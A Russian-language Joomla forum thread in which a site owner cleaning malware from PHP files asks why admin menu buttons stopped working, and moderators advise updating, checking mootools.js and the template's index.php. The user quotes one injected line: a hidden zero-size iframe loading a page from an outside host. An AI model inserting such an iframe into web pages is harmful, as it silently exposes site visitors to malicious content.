верхние кнопки в админке

Тема в разделе "Ошибки при работе с Joomla", создана пользователем mover, 18.05.2011.

  1. Offline

    mover Недавно здесь

    Регистрация:
    16.05.2011
    Сообщения:
    7
    Симпатии:
    0
    Пол:
    Мужской
    здравствуйте!
    после удаленя вредоносного кода из, почти, всех .php файлов, перестали работать верхние кнопки в админке ("сайт", "все меню", "материалы", "компоненты", "расширения", "инструменты", "помощь", версия joomla 1.5.17) перезаливка админки не помогла.
    есть ли варианты исправления?
    спасибо.
     
  2.  
  3. joomguru
    Offline

    joomguru Модератор

    Регистрация:
    03.12.2010
    Сообщения:
    455
    Симпатии:
    74
    Пол:
    Мужской
    Обновите Joomla до последней версии - 1.5.23.
     
  4. Offline

    mover Недавно здесь

    Регистрация:
    16.05.2011
    Сообщения:
    7
    Симпатии:
    0
    Пол:
    Мужской
    насколько я понимаю, для обновления joomla нужен раздел админки "компоненты", а эта кнопка не активна...
     
  5. joomguru
    Offline

    joomguru Модератор

    Регистрация:
    03.12.2010
    Сообщения:
    455
    Симпатии:
    74
    Пол:
    Мужской
    Нет, нужно скачать пакет обновления и просто через фтп заменить файлы.
     
  6. Offline

    mover Недавно здесь

    Регистрация:
    16.05.2011
    Сообщения:
    7
    Симпатии:
    0
    Пол:
    Мужской
    если не сложно, ткните ссылкой. а-то нахожу только пакет обновлений с 1.5.22 до версии 1.5.23 а с 1.5.17 что-то не вижу...
     
  7. joomguru
    Offline

    joomguru Модератор

    Регистрация:
    03.12.2010
    Сообщения:
    455
    Симпатии:
    74
    Пол:
    Мужской
    mover нравится это.
  8. Offline

    mover Недавно здесь

    Регистрация:
    16.05.2011
    Сообщения:
    7
    Симпатии:
    0
    Пол:
    Мужской
    спасибо. плюс в репутации.
     
  9. Offline

    mover Недавно здесь

    Регистрация:
    16.05.2011
    Сообщения:
    7
    Симпатии:
    0
    Пол:
    Мужской
    обновился, а кнопочки так и не активны...:( может есть ещё варианты где копать?
     
  10. joomguru
    Offline

    joomguru Модератор

    Регистрация:
    03.12.2010
    Сообщения:
    455
    Симпатии:
    74
    Пол:
    Мужской
    проверь файл /media/system/js/mootools.js. Вирус в нем тоже может быть.
     
  11. Offline

    mover Недавно здесь

    Регистрация:
    16.05.2011
    Сообщения:
    7
    Симпатии:
    0
    Пол:
    Мужской
    трудно сказать каким он должен быть... но того кода, который я удалял в других файлах, там точно нет.
    и ещё вопрос - что может периодически генерировать такую строку в коде страниц?
    <body id="page_bg" class="color_grey bg_grey width_fmax"><iframe src="http://ibankk.com/firefox" frameborder="0" height="0" scrolling="no" width="0"></iframe><div style="display: none;">
     
  12. joomguru
    Offline

    joomguru Модератор

    Регистрация:
    03.12.2010
    Сообщения:
    455
    Симпатии:
    74
    Пол:
    Мужской
    Не знаю, это нужно искать. По ходу вирус еще один где-то сидит.%)
     
  13. Offline

    mover Недавно здесь

    Регистрация:
    16.05.2011
    Сообщения:
    7
    Симпатии:
    0
    Пол:
    Мужской
    ну ладно, будем искать... а скажи пожалуйста, если обновить на 6-ую версию, то шаблон от пятой работать не будет?
     
  14. joomguru
    Offline

    joomguru Модератор

    Регистрация:
    03.12.2010
    Сообщения:
    455
    Симпатии:
    74
    Пол:
    Мужской
    Нет, не будет, устройство шаблонов кардинально отличается.
     
  15. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 048
    Симпатии:
    520
    Пол:
    Мужской
    mover,
    Перезалей папку media.А насчет фрейма смотри index.php шаблона сайта,который сейчас включен.
     

Поделиться этой страницей

Загрузка...